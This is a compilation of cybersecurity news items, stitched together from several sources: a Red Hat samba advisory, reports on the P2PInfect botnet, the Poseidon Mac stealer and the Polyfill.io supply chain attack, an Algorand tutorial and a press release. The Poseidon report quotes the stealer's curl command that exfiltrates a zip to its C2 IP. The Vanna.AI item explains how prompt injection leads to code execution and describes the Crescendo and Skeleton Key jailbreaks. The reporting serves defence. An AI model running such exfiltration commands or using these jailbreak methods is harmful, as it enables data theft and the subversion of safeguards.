Red Hat Security Advisory 2024-4101-03 - An update for samba is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4101.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: samba security updateAdvisory ID:        RHSA-2024:4101-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4101Issue date:         2024-06-25Revision:           03CVE Names:          CVE-2023-34966====================================================================Summary: An update for samba is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Samba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.Security Fix(es):* samba: infinite loop in mdssvc RPC service for spotlight (CVE-2023-34966)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-34966References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2222793

Red Hat Security Advisory 2024-4101-03

The peer-to-peer malware botnet known as P2PInfect has been found targeting misconfigured Redis servers with ransomware and cryptocurrency miners.
The development marks the threat's transition from what appeared to be a dormant botnet with unclear motives to a financially motivated operation.
"With its latest updates to the crypto miner, ransomware payload, and rootkit elements, it demonstrates

The peer-to-peer malware botnet known as P2PInfect has been found targeting misconfigured Redis servers with ransomware and cryptocurrency miners.

The development marks the threat's transition from what appeared to be a dormant botnet with unclear motives to a financially motivated operation.

"With its latest updates to the crypto miner, ransomware payload, and rootkit elements, it demonstrates the malware author's continued efforts into profiting off their illicit access and spreading the network further, as it continues to worm across the internet," Cado Security said in a report published this week.

P2PInfect came to light nearly a year ago, and has since received updates to target MIPS and ARM architectures. Earlier this January, Nozomi Networks uncovered the use of the malware to deliver miner payloads.

It typically spreads by targeting Redis servers and its replication feature to transform the victim systems into a follower node of the attacker-controlled server, subsequently allowing it to issue arbitrary commands to them.

The Rust-based worm also features the ability to scan the internet for more vulnerable servers, not to mention incorporating an SSH password sprayer module that attempts to log in using common passwords.

Besides taking steps to prevent other attackers from targeting the same server, P2PInfect is known to change the passwords of other users, restart the SSH service with root permissions, and even perform privilege escalation.

"As the name suggests, it is a peer-to-peer botnet, where every infected machine acts as a node in the network, and maintains a connection to several other nodes," security researcher Nate Bill said.

"This results in the botnet forming a huge mesh network, which the malware author makes use of to push out updated binaries across the network, via a gossip mechanism. The author simply needs to notify one peer, and it will inform all its peers and so on until the new binary is fully propagated across the network."

Among the new behavioral changes to P2PInfect include the use of the malware to drop miner and ransomware payloads, the latter of which is designed to encrypt files matching certain file extensions and deliver a ransom note urging the victims to pay 1 XMR (~$165).

"As this is an untargeted and opportunistic attack, it is likely the victims are to be low value, so having a low price is to be expected," Bill pointed out.

Also of note is a new usermode rootkit that makes use of the LD\_PRELOAD environment variable to hide their malicious processes and files from security tools, a technique also adopted by other cryptojacking groups like TeamTNT.

It's suspected that P2PInfect is advertised as a botnet-for-hire service, acting as a conduit to deploy other attackers' payloads in exchange for payment.

This theory is bolstered by the fact that the wallet addresses for the miner and ransomware are different, and that the miner process is configured to take up as much processing power as possible, causing it to interfere with the functioning of the ransomware.

"The choice of a ransomware payload for malware primarily targeting a server that stores ephemeral in-memory data is an odd one, and P2Pinfect will likely see far more profit from their miner than their ransomware due to the limited amount of low-value files it can access due to its permission level," Bill said.

"The introduction of the usermode rootkit is a 'good on paper' addition to the malware. If the initial access is Redis, the usermode rootkit will also be completely ineffective as it can only add the preload for the Redis service account, which other users will likely not log in as."

The disclosure follows AhnLab Security Intelligence Center's (ASEC) revelations that vulnerable web servers that have unpatched flaws or are poorly secured are being targeted by suspected Chinese-speaking threat actors to deploy crypto miners.

"Remote control is facilitated through installed web shells and NetCat, and given the installation of proxy tools aimed at RDP access, data exfiltration by the threat actors is a distinct possibility," ASEC said, highlighting the use of Behinder, China Chopper, Godzilla, BadPotato, cpolar, and RingQ.

It also comes as Fortinet FortiGuard Labs pointed out that botnets such as UNSTABLE, Condi, and Skibidi are abusing legitimate cloud storage and computing services operators to distribute malware payloads and updates to a broad range of devices.

"Using cloud servers for \[command-and-control\] operations ensures persistent communication with compromised devices, making it harder for defenders to disrupt an attack," security researchers Cara Lin and Vincent Li said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Rust-Based P2PInfect Botnet Evolves with Miner and Ransomware Payloads

A competitor of the infamous Atomic Stealer targeting Mac users, has just launched a new campaign to lure in more victims.

On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as **OSX.RodStealer**, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

**Rodrigo4 launches new PR campaign**

A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Forum post by Rodrigo4 on XSS

Hello everyone, we have released the V4 update and there are quite a lot of new things.  
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

**Distribution via Google ads**

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name _arcthost\[.\]org_:

Malicious ad for Arc browser via Google search

People who clicked on the ad were redirected to _arc-download\[.\]com_, a completely fake site offering Arc for Mac only:

Decoy website for Arc

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Malicious Arc DMG installer

**Connection to new Poseidon project**

The new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:

Excerpt from forum post featuring new VPN capability

More interesting is the data exfiltration which is revealed in the following command:

set result\_send to (do shell script \\"curl -X POST -H \\\\\\"uuid: 399122bdb9844f7d934631745e22bd06\\\\\\" -H \\\\\\"user: H1N1\_Group\\\\\\" -H \\\\\\"buildid: id777\\\\\\" --data-binary @/tmp/out.zip http:// 79.137.192\[.\]4/p2p\\")

Navigating to this IP address reveals the new Poseidon branded panel:

Poseidon panel login page

**Conclusion**

There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac detects this this ‘Poseidon campaign as _**OSX.RodStealer**_ and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

**Indicators of Compromise**

Google ad domain

arcthost\[.\]org

Decoy site

arc-download\[.\]com

Download URL

zestyahhdog\[.\]com/Arc12645413\[.\]dmg

Payload SHA256

c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05

C2

79.137.192\[.\]4/p2p

 &#8216;Poseidon&#8217; Mac stealer distributed via Google ads 

Did you know it’s now possible to build blockchain applications, known also as decentralized applications (or “dApps” for short) in native Python? Blockchain development has traditionally required learning specialized languages, creating a barrier for many developers… until now. AlgoKit, an all-in-one development toolkit for Algorand, enables developers to build blockchain applications in pure

Did you know it's now possible to build blockchain applications, known also as decentralized applications (or "dApps" for short) in native Python? Blockchain development has traditionally required learning specialized languages, creating a barrier for many developers… until now. AlgoKit, an all-in-one development toolkit for Algorand, enables developers to build blockchain applications in pure Python.

This article will walk you through the benefits of building blockchain applications, why Python is an ideal choice for dApp development, how to set up your blockchain development environment, and how to start building secure blockchain applications in native Python.

**Why build blockchain applications?**

Blockchain application development goes far beyond creating a decentralized database and peer-to-peer transactions. It unlocks a new level of trust, security, and efficiency for various applications.

**Guarantee tamper-proof records:** Blockchain creates an immutable and transparent ledger, ensuring data security and eliminating the risk of manipulation.

**Automate complex agreements:** Smart contracts and atomic swaps eliminate the need for third-party verification, streamlining transactions and reducing costs.

**Revolutionize asset ownership:** Digitization allows for fractional ownership and secure trading of real-world assets.

**Build innovative solutions:** Python development skills can be used to create groundbreaking applications in AI, identity management, and secure IoT data exchange.

**Why use Python to build blockchain applications?**

**Readability and maintainability:** Python's smooth syntax and robust tooling make it easier to write, understand, and modify code, especially when working on complex, powerful blockchain projects.

**Integration with other technologies:** Python works well with other technologies often used alongside blockchain, such as web development frameworks and machine learning libraries. This allows for building dApps that go beyond core blockchain functionality.

**World-class developer experience:** Python has a vast and active developer community, plus top-notch, comprehensive documentation and robust tools to support your Python and blockchain development journey.

**How to set up your development environment to start building blockchain applications**

The simplest way to build blockchain applications in Python is to download and install AlgoKit. This one-stop toolkit empowers you to build, launch, and deploy secure, production-ready decentralized applications on the Algorand blockchain.

With AlgoKit, you can set up your development environment and project folder and start building your project with just one command.

**Download and install prerequisites**

Ensure you have installed Python 3.12 or higher, pipx, Git, and Docker. On macOS, you will also need to install Homebrew.

**Install AlgoKit**

Open the command line/terminal and type "pipx install algokit". This will install AlgoKit so that you can use it in any directory.

**Set up a local blockchain network**

You can try out a private version of the Algorand blockchain on your computer.

Type "algokit localnet start" into the command line/terminal. This will create a local blockchain network running in a container using Docker. You can then check the Docker Desktop app to see it running.

To launch a browser-based blockchain explorer to visualize what is happening on this local network, type "algokit localnet explore".

**Create a new project**

Now that AlgoKit is installed, you can create a new project for your blockchain application.

First, run "algokit init". This will launch a guided process, and you will be prompted to answer a few quick questions to set up your project.

If this is your first time, start by selecting "smart contracts" to indicate you're building a smart contract application.

Since you'll be writing Python code, select "Python" as your language and pick a name for the folder that will store all your project's files and a name for your application.

Finally, choose the "Production" template to set up a project ready for deployment.

The production template is like a pre-built starter kit for your Algorand project. It will give you a clear picture of how different parts like testing, continuous integration/continuous delivery (CI/CD), and deployment work together in a complete Algorand project. Then, select "Python" again.

Answer Y to the next questions to have AlgoKit install dependencies and initialize a Git repository for you.

Once you have completed the project generation process, open the project directory in your preferred code editor.

**How to build secure blockchain applications in Python****Explore the code**

The "Production" template will include a simple "hello world" smart contract found in "smart\_contracts/hello\_world/contract.py". This contract should look pretty familiar to Python developers with a couple of key differences.

The first thing to note is that we inherit "ARC4Contract" for our "HelloWorld" class. ARC4 is Algorand Request for Comment #0004 which defines the application binary interface (ABI) for Algorand methods. By inheriting from "ARC4Contract", we guarantee the contract is compliant with this standard that many tools in the Algorand ecosystem, including AlgoKit itself, use.

Above the actual "hello" method definition there is also a "@arc4.abimethod" decorator. This decorator exposes the method as a public method within our contract. Because this is an ARC4 ABI method, any tooling that supports the ABI can call this method with ease. AlgoKit also includes a client generator, which can generate a Python or TypeScript client to interact with all of the ABI methods you have defined.

Finally, you'll notice that the argument and return type of our function is an "arc4.String". ARC4 also defines how we encode and decode data types when interacting with contracts. Because the Algorand Virtual Machine (AVM) does not support all the same features as a Python "str", we need to use the "arc4.String" type provided by the "algopy" module.

**Compile and build**

You can use "algokit project run build" to compile the smart contract written in native Python into TEAL, the bytecode language that the AVM can understand. Building also generates additional artifacts that can be used to make interactions with the contract easier, as we will see in the tests.

Interact and test

To see how contract interaction and testing are done, navigate to "tests/hello\_world\_test.py". Here you can see that we are using the HelloWorldClient that has been auto-generated by AlgoKit during the build step. This makes it very easy to interact with the contract and can be leveraged in tests, backend, or frontend development.

**Write your code**

After exploring this project and running your first "Hello World", you are ready to build on Algorand! You can turn the example contract into your own dApp, such as a marketplace, a manager of tokenized real-world assets, or an immutable data store on the chain.

Write your on-chain smart contract logic in contract.py and associated tests in "smart\_contracts/tests". Re-run "algokit project run build" to re-compile, deploy, and test the contract in seconds.

You are now prepared to iterate quickly as you build your own application while AlgoKit takes care of the boilerplate code and development environment configuration.

For more tutorials about how to use Python to build on Algorand with AlgoKit, visit the AlgoDevs YouTube channel.

For more information on Algorand Python, refer to the documentation.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

How to Use Python to Build Secure Blockchain Applications

Cybersecurity researchers have disclosed a high-severity security flaw in the Vanna.AI library that could be exploited to achieve remote code execution vulnerability via prompt injection techniques.
The vulnerability, tracked as CVE-2024-5565 (CVSS score: 8.1), relates to a case of prompt injection in the "ask" function that could be exploited to trick the library into executing arbitrary

Cybersecurity researchers have disclosed a high-severity security flaw in the Vanna.AI library that could be exploited to achieve remote code execution vulnerability via prompt injection techniques.

The vulnerability, tracked as CVE-2024-5565 (CVSS score: 8.1), relates to a case of prompt injection in the "ask" function that could be exploited to trick the library into executing arbitrary commands, supply chain security firm JFrog said.

Vanna is a Python-based machine learning library that allows users to chat with their SQL database to glean insights by "just asking questions" (aka prompts) that are translated into an equivalent SQL query using a large language model (LLM).

The rapid rollout of generative artificial intelligence (AI) models in recent years has brought to the fore the risks of exploitation by malicious actors, who can weaponize the tools by providing adversarial inputs that bypass the safety mechanisms built into them.

One such prominent class of attacks is prompt injection, which refers to a type of AI jailbreak that can be used to disregard guardrails erected by LLM providers to prevent the production of offensive, harmful, or illegal content, or carry out instructions that violate the intended purpose of the application.

Such attacks can be indirect, wherein a system processes data controlled by a third party (e.g., incoming emails or editable documents) to launch a malicious payload that leads to an AI jailbreak.

They can also take the form of what's called a many-shot jailbreak or multi-turn jailbreak (aka Crescendo) in which the operator "starts with harmless dialogue and progressively steers the conversation toward the intended, prohibited objective."

This approach can be extended further to pull off another novel jailbreak attack known as Skeleton Key.

"This AI jailbreak technique works by using a multi-turn (or multiple step) strategy to cause a model to ignore its guardrails," Mark Russinovich, chief technology officer of Microsoft Azure, said. "Once guardrails are ignored, a model will not be able to determine malicious or unsanctioned requests from any other."

Skeleton Key is also different from Crescendo in that once the jailbreak is successful and the system rules are changed, the model can create responses to questions that would otherwise be forbidden regardless of the ethical and safety risks involved.

"When the Skeleton Key jailbreak is successful, a model acknowledges that it has updated its guidelines and will subsequently comply with instructions to produce any content, no matter how much it violates its original responsible AI guidelines," Russinovich said.

"Unlike other jailbreaks like Crescendo, where models must be asked about tasks indirectly or with encodings, Skeleton Key puts the models in a mode where a user can directly request tasks. Further, the model's output appears to be completely unfiltered and reveals the extent of a model's knowledge or ability to produce the requested content."

The latest findings from JFrog – also independently disclosed by Tong Liu – show how prompt injections could have severe impacts, particularly when they are tied to command execution.

CVE-2024-5565 takes advantage of the fact that Vanna facilitates text-to-SQL Generation to create SQL queries, which are then executed and graphically presented to the users using the Plotly graphing library.

This is accomplished by means of an "ask" function – e.g., vn.ask("What are the top 10 customers by sales?") – which is one of the main API endpoints that enables the generation of SQL queries to be run on the database.

The aforementioned behavior, coupled with the dynamic generation of the Plotly code, creates a security hole that allows a threat actor to submit a specially crafted prompt embedding a command to be executed on the underlying system.

"The Vanna library uses a prompt function to present the user with visualized results, it is possible to alter the prompt using prompt injection and run arbitrary Python code instead of the intended visualization code," JFrog said.

"Specifically, allowing external input to the library's 'ask' method with 'visualize' set to True (default behavior) leads to remote code execution."

Following responsible disclosure, Vanna has issued a hardening guide that warns users that the Plotly integration could be used to generate arbitrary Python code and that users exposing this function should do so in a sandboxed environment.

"This discovery demonstrates that the risks of widespread use of GenAI/LLMs without proper governance and security can have drastic implications for organizations," Shachar Menashe, senior director of security research at JFrog, said in a statement.

"The dangers of prompt injection are still not widely well known, but they are easy to execute. Companies should not rely on pre-prompting as an infallible defense mechanism and should employ more robust mechanisms when interfacing LLMs with critical resources such as databases or dynamic code generation."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Prompt Injection Flaw in Vanna AI Exposes Databases to RCE Attacks

PRESS RELEASE

DENVER — June 25, 2024 — Optiv, the cyber advisory and solutions leader, has published its 2024 Threat and Risk Management Report, which examines how organizations’ cybersecurity investments and governance priorities are keeping up with the evolving threat landscape. 

Based on an independent Ponemon Institute survey, the report reveals a 59% increase in cyber budgets year-over-year. Additionally, 63% of organizations with more than 5,000 employees had an average of $26 million allocated to cybersecurity investments in 2024.

The report shows a significant rise in data breaches and security incidents, with 61% of respondents experiencing a data breach or cybersecurity incident in the past two years, and 55% of respondents experiencing four or more incidents in that timeframe. These numbers highlight the urgent need for organizations to further prioritize cybersecurity investments and strategies.

Download the full report: 2024 Cybersecurity Threat and Risk Management Report

“Cyber incidents are not slowing down, which means organizations must work at a speed above those of the threat actors attacking their environments. As we see security budgets increasing, many organizations are also recognizing the need to make smart investments in process and governance assessments to ensure compliance,” says Jason Lewkowicz, executive vice president and chief services officer at Optiv. “Establishing a more consistent, strategic approach to security technology, process and people management will be essential for organizational risk management and resilience.”

Additional key findings include:

*   Security Tool Overload — While organizations are investing in more technologies, 40% of respondents believe they have too many, hindering overall effectiveness. By contrast, only 29% feel that they have the right number of tools. This underscores the need for a strategic approach to cybersecurity investment, focusing on streamlining existing tools and ensuring a seamless technology stack integration.
    
*   Top Investment Areas — The top three areas of investment for 2024 cybersecurity budgets are internal security assessments (60%), identity and access management (IAM) programs (58%) and the acquisition of additional cybersecurity tools (51%).
    
*   Lack of Formal Budgeting Practices — Despite increasing budgets, only 36% of respondents have a formal approach to determining cybersecurity budgets. This lack of formal budgeting practices can lead to inefficiencies and missed opportunities to address critical security gaps.
    
*   Rising SOAR Adoption — The use of security orchestration automation and response (SOAR) technology is increasing, with 73% of respondents leveraging SOAR to automate incident response activities. This automation can help security teams respond more efficiently to threats. 
    

Artificial intelligence (AI) and machine learning (ML) capabilities are another growing focal area for cybersecurity organizations looking for ways to accelerate their threat detection, prevention and process automation capabilities to keep up with threat actors who are also using these tools.

More companies are leveraging AI in the form of use and prevention:

*   44% of respondents use AI/ML to prevent cyberattacks
    
*   35% purchased use-case specific tools
    

*   34% use automated processes and audits
    

Optiv’s report delves deeper into best practices employed by high-performing organizations, offering valuable insights for those seeking to strengthen their cyber defenses. It also explores additional challenges, such as the inconsistency of cybersecurity incident response plans (CSIRPs), navigating cyber insurance/governance requirements and the need for improved communication of cybersecurity risks to senior management.

“Our independent research for Optiv reveals the positive steps organizations are taking to reduce risk, while also addressing the challenges they face in the evolving cyber threat landscape,” said Dr. Larry Ponemon, chairman and founder of the Ponemon Institute. “Part of the complexity organizations continue to face in dealing with threats is due to the number of ineffective technology tools. Recognizing this, IT professionals and senior leadership are becoming more cognizant of the importance in strengthening their security posture, resulting in the increase of cybersecurity budgets and allocating funds based on proven effectiveness in reducing security incidents.”

Findings from Optiv’s report are based on responses from 650 IT and cybersecurity professionals.

For the latest news and updates from Optiv, visit https://www.optiv.com/company/optiv-newsroom.

You May Also Like

Optiv Report Shows Nearly 60% Increase in Security Budgets as Most Organizations Report Cyber Breaches and Incidents

In this Black Hat USA preview, scholar Jason Healey examines strategies for measuring and shifting the balance of cyber defense.

Source: Ronstik via Alamy

Defenders are perpetually playing catch-up to attackers. For every security innovation or new technology introduced, cybercriminals develop just as many tricks to bypass them. This ongoing struggle will be the focus of an upcoming presentation at Black Hat USA 2024, this August in Las Vegas, by Jason Healey, a senior research scholar at Columbia University.

"For over 50 years, we've known that the red team always gets through," Healey says. "Despite the billions of dollars spent, thousands of patents filed, and countless hours worked, defense hasn't notably improved relative to offense."

Last year's publication of the US National Cybersecurity Strategy marked a significant milestone, setting a new goal to enhance defense at the largest scale and least cost. However, Healey argues that progress means little without measurable indicators to determine whether defense is gaining relative advantages over offense.

Healey's session at Black Hat — titled "Is Defense Winning?" — will introduce several key indicators to assess whether the balance is shifting in favor of defense.

"Many of these indicators, such as changes to mean time to detect \[MTTD\], are already collected by the community," he says. "Others, like measuring the mean time between catastrophes, might need to be fresh."

Drawing parallels with climate change metrics, Healey says there is a need for a similar holistic approach to security as well.

"Just as climate experts track CO2 levels and temperature changes, we need macro-level indicators to understand cyberspace as a whole," he says.

**Measuring Success in Cyber Defense**

Healey played a role in drafting the National Cybersecurity Strategy, which incorporates the concept of defensibility and leverage. He believes systemic changes, such as automated updates, over individual actions, like user education or isolated security measures, will be more important in affecting change for defenders.

"We need to find areas where the smallest turn of the screwdriver will have the largest impact," he says.

One of the critical challenges Healey addresses is how to measure success in cyber defense. He proposes several propositions and indicators to gauge progress, including the ability of threat actors to adapt their tactics, techniques, and procedures (TTPs).

"We would want to see them having to rapidly change their TTPs because we're thwarting them," he says.

Healey also calls for the cybersecurity community to leverage existing reports, such as Verizon's annual data breach report and Google's zero-day reports, to establish defensibility metrics.

"Companies like Veracode already report relevant metrics, but they need to be presented in time series to track trends," he says.

**Achieving New Indicators for Defense**

Healey's ultimate goal is to inspire the cybersecurity community to strive for measurable improvements. His presentation aims to spark a crucial conversation about the effectiveness of current strategies and the importance of setting tangible goals, challenging attendees to reflect on their collective impact.

"We need to set reasonable targets, like reducing the mean time to detect and dwell time to less than 24 hours by 2030," Healey says. "Are we actually making the difference we say we want to have in the world?"

By introducing new indicators and drawing on lessons from other fields, Healey aims to equip defenders with the tools they need to shift the balance in their favor. The date and time for Healey's presentation will be published soon.

**About the Author(s)**

Contributing Writer, Dark Reading

Joan Goodchild is a veteran journalist, editor, and writer who has been covering security for more than a decade. She has written for several publications and previously served as editor-in-chief for CSO Online.

Is Defense Winning? A Look at Decades of Playing Catch-up

The vulnerability affects not only AirPods, but also AirPods Max, Powerbeats Pro, Beats Fit Pro, and all models of AirPods Pro.

Source: Hoor Aloraidh via Alamy Stock Photo

Apple released its latest firmware update for its AirPods products to address a vulnerability that could give a threat actor unauthorized access.

The vulnerability is tracked as CVE-2024-27867 and affects AirPods (second generation and later) and AirPods Pro (all models), as well as AirPods Max, Powerbeats Pro, and Beats Fit Pro.

"When your headphones are seeking a connection request to one of your previously paired devices, an attacker in Bluetooth range might be able to spoof the intended source device and gain access to your headphones," reported Apple in an advisory.

To fix for the issue, Apple said that an "authentication issue was addressed with improved state management" in AirPods firmware update 6A326, AirPods firmware update 6F8, and Beats firmware update 6F8. These firmware updates are automatically delivered to a user's device while the headphones or AirPods are in Bluetooth range of an iPhone, iPad, or Mac.

Apple credited Jonas Dreßler for the discovery of the flaw as with well as reporting the bug to the company.

**About the Author(s)**

Apple AirPods Bug Allows Eavesdropping

The site is supplying malicious code that delivers dynamically generated payloads and can lead to other attacks, after a Chinese organization bought it earlier this year.

Source: Bleakstar via Shutterstock

A domain that more than 100,000 websites use to deliver JavaScript code is now being used as a conduit for a Web supply chain attack that uses dynamically generated payloads, redirects users to pornographic and sports-betting sites, and can potentially lead to data theft, clickjacking, or other attacks. The malicious activity follows the sale of the domain polyfill\[.\]io to a Chinese organization earlier this year.

Security researchers are warning that the cdn\[.\]polyfill\[.\]io domain has been compromised to serve malicious code in scripts to end users in a widespread attack. The site allows websites to use modern JavaScript features in older browsers by including only the necessary polyfills based on the user's browser.

Researchers from security monitoring firm c/side sounded the alarm about the attack in an advisory by founder Simon Wijckmans warning website owners to "check your code for any use of the polyfill\[.\]io domain and remove it from your applications."

"This attack places an estimated +100k websites at immediate risk," he wrote. "When a once-safe domain is embedded in thousands of websites and concealed like JavaScript threats are, it becomes a tempting path for malicious actors."

**Dynamically Generated Payloads**

Specifically, researchers discovered malicious, obfuscated code that "dynamically generates payloads based on HTTP headers, activating only on specific mobile devices, evading detection, avoiding admin users, and delaying execution" being injected into devices via websites using cdn\[.\]polyfill\[.\]io, Wijckmans wrote.

"In some instances, users receive tampered JavaScript files, which include a fake Google Analytics link," he wrote. "This fake link redirects users to various sports betting and pornographic websites, seemingly based on their region."

Given that the malicious code is JavaScript, it also could "at any moment introduce new attacks like formjacking, clickjacking, and broader data theft," Wijkmans noted.

**Polyfill Users Were Forewarned**

Polyfill users were already clued in back in February of the potential for malicious activity and were advised to stop using the polyfill\[.\]io domain after it was purchased by Funnull, a Chinese company. Following the sale, the developer of the open source Polyfill project, Andrew Betts, urged users in a post on X to remove references to the content delivery network (CDN), in part because he never owned the site.

"I created the Polyfill service project but I have never owned the domain name and I have had no influence over its sale," he wrote.

A site called Pollykill was even created on Feb. 27 "to bring awareness to a major JavaScript supply chain vulnerability," since Polyfill was sold and all Polyfill traffic was pointed "to the Baishan Cloud CDN."

Pollykill also provides users with alternatives to using the site to deliver JavaScript to their websites, warning users of the "many risks associated with allowing an unknown foreign entity to manage and serve JavaScript within your web application."

"They can quietly observe user traffic, and if malicious intent were taken, they can potentially steal usernames, passwords and credit card information directly as users enter the information in the Web browser," according to the site.

**Immediate Action Required**

Supply chain attacks that compromise website scripts and other code that's used widely across applications or Web properties are serious business, which means anyone using Polyfill needs to take action now, Wijkmans said.

"Third-party resources are in a very powerful position and thus a high value target for bad actors," he wrote, adding that CDNs hosting third-party scripts are especially subject to attack.

However, one thing that's important to note is that "the Polyfill service itself is still solid," Wijkmans said. "You can host your own version in a safe and controlled environment without issue."

As the problem lies in the domain cdn\[.\]polyfill\[.\]io, it should immediately be removed from any site using it. Moreover, threat feeds currenty don't flag the domain, so administrators should not rely on that, Wijkmans added.

The Polykill website also advises developers to use a code search tool or integrated development environment (IDE) to search for instances of the malicious domain in source code across all projects within an organization. It cites resources by the developer community Fastly Connect that also can help them secure websites that use Polyfill; these include polyfill-fastly\[.\]net and polyfill-fastly\[.\]io, which are free drop-in replacements for polyfill\[.\]io in a website's code.

Fastly’s fork of the open source code 223 also can be used to self-host the service to maintain full control over the code delivered to users, according to Fastly.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Polyfill.io Supply Chain Attack Smacks Down 100K+ Websites

Affected devices could include wireless access points, routers, switches and VPNs.

Tag

#mac